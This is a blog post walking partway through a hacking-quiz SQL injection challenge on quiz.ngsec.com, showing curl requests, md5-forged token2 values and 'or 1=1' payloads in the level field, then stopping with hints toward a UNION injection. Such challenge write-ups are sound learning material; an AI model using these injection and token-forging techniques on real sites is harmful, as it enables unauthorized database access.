This a blind sql injection with a twist. Thanks to everybody at the dc303 meeting Friday. I learned a lot.
Upon first inspection, game 1 doesn't seem to be susceptible to any sort of issue.
Some odd things are being set:
name="token" value="34bu5Un3zJ3S4AxXV52pmRMW7U5PUnv2"Finally we figured out the second value was an md5sum of the 'level' value, 1. Some more messing around and we figured out that we would get a "Query String Tampered!", must be some sort of weak field verification.
name="token2" value="c4ca4 238a0b923820dcc509a6f75849b"
name="level" value="1"
After being stuck, and prone to cheeting ;) ... I finally broke down and looked in the forums. Thats where someone pointed out the call to game3/level1/ajax_auth_ver3.php. Version 3 huh? Wonder if there is a version 1.
(note some of the url has been remove for formating)
$ curl http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login=hax0r\&password=reet123\&token=EhCsWGA7h67qSExYP2lDvaKZ2SlPx7j5\&=c4ca4238a0b923820dcc509a6f75849b\&level=1
Error: invalid credentials.
Looks like it, wonder if this one has issues.echo -n "1 ' or 1=1" | md5sum
8cf277be3b542e7abd5458bc2ba3a7a7
$ curl http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login=hax0r\&password=reet123\&token=EhCsWGA7h67qSExYP2lDvaKZ2SlPx7j5\&token2=8cf277be3b542e7abd5458bc2ba3a7a7\&level=1\'+or+1=1--
Query String Tampered!
Hrm... what is going on. Messing around some more, the entry must be getting stripped. This can also be verified looking at the file ajax.js. In particular this line:
qstr = 'login=' + escape(login) + '&password='+ (password) + '&token='+ escape(token) + '&token2='+ escape(token2) + '&level='+ escape(level);
Weak sauce. Some more playing around, and we finally find out this script is indeed injectable.$ echo -n a | md5sum
0cc175b9c0f1b6a831c399e269772661
$ curl http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login=hax0r\&password=reet123\&token=EhCsWGA7h67qSExYP2lDvaKZ2SlPx7j5\&token2=0cc175b9c0f1b6a831c399e269772661\&level=a
Error: SQL error.
Thats good.$ echo -n "1 or 1=1" | md5sum
77a63a557cb73fffdf2247ac79e6b8f2
$ curl http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login=hax0r\&password=reet123\&token=EhCsWGA7h67qSExYP2lDvaKZ2SlPx7j5\&token2=77a63a557cb73fffdf2247ac79e6b8f2\&level=1+or+1=1
Error: invalid credentials.
So we are able to inject sql.
Having blown past my knowledge of sql injection a while ago, I read the forum over and over and over, as well as just about every sql injection google hit.
I don't want to give the rest away, so here are some hints.
- The answer is a UNION injection in the level field.
- The md5sum of label must match token2.
- You need something in the login and password fields.
- You want the injection to return 1 result.
*2007-02-21 - fix typo.
1 comment:
typo: level not label
Post a Comment